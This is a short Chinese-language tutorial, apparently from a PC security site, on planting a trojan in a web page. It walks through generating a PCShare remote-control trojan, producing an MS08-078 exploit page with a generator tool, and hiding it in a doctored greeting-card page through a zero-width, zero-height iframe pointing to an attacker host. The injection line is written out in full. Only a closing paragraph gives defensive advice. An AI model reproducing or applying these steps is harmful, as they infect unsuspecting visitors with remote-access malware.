IFRAME框架挂马实战
下面我们来做个演示,看看IFRAME框架挂马到底是怎么做的。
第一步:准备一款得心应手的木马,例如PCShare,这款软件在设置上非常简单,易于操作上手。设置好相关服务,最后生成木马所用的服务控制端。
第二步:使用FTP将木马上传到自己的网站空间中,并用记事本记录下木马的网络路径。然后再用《MS08-078网页木马生成器》,生成一个带有MS08-078漏洞的恶意网页。找一个正常的新年贺卡网页,将该网页保存到自己指定的目录中,然后使用Web Designer或Dreamweaver网页编辑软件对保存的网页进行调整修改,然后上传到自己的网站空间中,看图片等内容是否能够正常显示。
第三步:再一次打开修改好的贺卡网页,使用IFRAME标记语句,将生成好的MS08-078网页嵌入到贺卡网页中,嵌入挂马代码如下:
<iframe src=http://www.hacker.com/ms08078.html width=0 height=0></iframe>
将这段代码插入到贺卡网页之中后,就完成了我们的网页挂马操作。浏览贺卡网页的用户,在看到贺卡页面之后,也随之运行了保存在指定位置“http://www.hacker.com/ms08078.html”的漏洞溢出页面,但是由于它的长和宽都为“0”,观看贺卡网站的用户不会看到溢出页面。
PC捍卫者提示:对于IFRAME标记这种利用正常HTML语言功能实现隐藏的挂马方式,目前并没有好的防范方法,因为它是正常的网页功能。大家只能够寄希望于杀毒软件和防挂马软件阻止利用IFRAME标记内嵌的溢出病毒网页。我们建议在安装杀毒软件之后,能够安装第三方防挂马软件作为补充,例如360安全卫士等。
转截请注明:文章来自 pc捍卫者 http://www.pchwz.com
本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点